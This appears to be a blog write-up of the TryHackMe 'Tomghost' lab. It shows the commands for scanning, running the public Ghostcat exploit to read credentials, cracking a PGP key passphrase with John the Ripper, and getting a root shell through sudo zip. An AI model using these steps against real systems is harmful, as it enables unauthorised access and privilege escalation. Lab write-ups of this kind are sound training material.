TryHackMe Tomghost-Writeup

Tomghost is a beginner level machine from tryhackme. The machine is focused on teaching about the famous Apache Jserv exploit Ghostcat. We use Ghostcat LFI exploit to gather ssh credentials and gain access to the machine. The machines also has some pgp encryption files for us to crack and the final root access is gained by exploit misconfigured sudo privileges on the zip binary

Tomghost-Writeup

Connecting to HTB Vpn:

1] First download the vpn file from the access page of tryhackme
2] Open the .ovpn file in your terminal with the following command

openvpn yourname.ovpn

3] Now as the “Initialization Completed” message appears on the screen you are connected to the hackthebox network
4] You can access the machine at the given ip

SCANNING

1] First let’s do a nmap scan on our target at 10.10.17.168

nmap -sV -A -p- 10.10.17.168

-sV : to get the service versions on each port
-A : to get information such as os details,traceroutes,ports etc
-p- : to scan all 65535 ports
We get the following details from our scan

Tomghost-Writeup

ENUMERATION

2] There is an open port with Apache Jserv running and i know a famous exploit for this service called Ghostcat

Tomghost-Writeup

So whenever you see an Apache Jserv port open try this exploit

searchsploit ghostcat

Tomghost-Writeup

3] Let’s download the exploit to our machine

searchsploit -m 48143

4] Now run the exploit with the IP address of the machine and we got some credentials

python 48143.py -p 8009 10.10.17.168

Tomghost-Writeup

GAINING ACCESS

5] Let’s try these credentials in ssh

ssh [email protected]

Tomghost-Writeup

6] There are two files present, so let’s transfer these two files using scp

scp [email protected]:/home/skyfuck/* .

Tomghost-Writeup

7] So this a pgp private key and public key, use these commands to decrypt this

gpg2john tryhackme.asc > new

john –wordlist=/usr/share/wordlists/rockyou.txt new

john –show new

Tomghost-Writeup

So we got a passphrase, now lets decrypt the pgp file

gpg –import tryhackme.asc
gpg –decrypt credential.pgp

And enter the passphrase we got earlier

Tomghost-Writeup

8] So now we got credentials for the user merlin. Let’s login via ssh

ssh [email protected]

PRIVILEGE ESCALATION

9] Let’s check what all sudo privileges does the user merlin is allowed

sudo -l

Tomghost-Writeup

10] It says we can run zip as the root user, so lets use GTFOBins to exploit this

https://gtfobins.github.io/gtfobins/zip/#sudo

Enter the following command to get root shell

TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT ‘sh #’
sudo rm $TF

Tomghost-Writeup

Don’t forget to check out our latest Blogs – TryHackMe Simple CTF-Writeup

Leave a Reply

Your email address will not be published. Required fields are marked *